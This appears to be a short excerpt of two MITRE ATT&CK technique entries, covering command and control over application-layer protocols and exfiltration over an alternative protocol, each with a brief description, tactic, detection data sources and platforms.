Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre